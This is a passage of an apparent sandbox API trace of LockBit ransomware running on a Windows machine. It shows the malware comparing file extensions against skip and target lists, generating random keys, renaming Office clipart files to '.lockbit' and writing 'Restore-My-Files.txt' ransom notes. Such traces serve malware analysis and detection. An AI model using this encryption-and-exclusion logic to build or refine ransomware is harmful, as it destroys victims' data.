lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.349] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.350] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198020.WMF") returned 1 [0150.351] lstrcmpiW (lpString1="ntldr", lpString2="J0198020.WMF") returned 1 [0150.351] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198020.WMF") returned 1 [0150.351] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198020.WMF") returned -1 [0150.351] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198020.WMF") returned -1 [0150.351] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198020.WMF") returned 1 [0150.351] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198020.WMF") returned -1 [0150.351] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.351] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF") returned=".WMF" [0150.351] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.351] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.351] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.352] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.352] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF.lockbit") returned 72 [0150.353] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198020.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.353] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.354] malloc (_Size=0x40068) returned 0x3d70450 [0150.354] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=23726) returned 1 [0150.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.355] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.360] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.360] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.361] free (_Block=0x1fa2ed8) [0150.361] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198020.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.361] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.362] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.362] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745ba100, ftCreationTime.dwHighDateTime=0x1bd8464, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x745ba100, ftLastWriteTime.dwHighDateTime=0x1bd8464, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198021.WMF", cAlternateFileName="")) returned 1 [0150.362] lstrcmpiW (lpString1=".", lpString2="J0198021.WMF") returned -1 [0150.362] lstrcmpiW (lpString1="..", lpString2="J0198021.WMF") returned -1 [0150.362] PathFindExtensionW (pszPath="J0198021.WMF") returned=".WMF" [0150.362] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.362] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.363] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.363] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.364] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198021.WMF") returned 1 [0150.364] lstrcmpiW (lpString1="ntldr", lpString2="J0198021.WMF") returned 1 [0150.364] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198021.WMF") returned 1 [0150.364] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198021.WMF") returned -1 [0150.364] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198021.WMF") returned -1 [0150.364] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198021.WMF") returned 1 [0150.364] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198021.WMF") returned -1 [0150.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF") returned=".WMF" [0150.365] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.365] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.365] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.366] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.366] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF.lockbit") returned 72 [0150.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198021.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0150.372] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.372] malloc (_Size=0x40068) returned 0x3e70008 [0150.372] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=34912) returned 1 [0150.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0150.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.373] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0150.373] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.376] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.376] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.378] free (_Block=0x1fa2ed8) [0150.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198021.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18fcfa00, ftCreationTime.dwHighDateTime=0x1c0323d, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18fcfa00, ftLastWriteTime.dwHighDateTime=0x1c0323d, nFileSizeHigh=0x0, nFileSizeLow=0x6624, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198022.WMF", cAlternateFileName="")) returned 1 [0150.378] lstrcmpiW (lpString1=".", lpString2="J0198022.WMF") returned -1 [0150.378] lstrcmpiW (lpString1="..", lpString2="J0198022.WMF") returned -1 [0150.378] PathFindExtensionW (pszPath="J0198022.WMF") returned=".WMF" [0150.378] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.378] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.378] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.379] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.380] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198022.WMF") returned 1 [0150.381] lstrcmpiW (lpString1="ntldr", lpString2="J0198022.WMF") returned 1 [0150.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198022.WMF") returned 1 [0150.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198022.WMF") returned -1 [0150.381] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198022.WMF") returned -1 [0150.381] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198022.WMF") returned 1 [0150.381] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198022.WMF") returned -1 [0150.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF") returned=".WMF" [0150.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.381] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.381] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.382] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF.lockbit") returned 72 [0150.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198022.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198022.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.388] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.388] malloc (_Size=0x40068) returned 0x3df0008 [0150.388] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26148) returned 1 [0150.388] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.389] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.393] RtlDosPathNameToNtPathName_U (in: 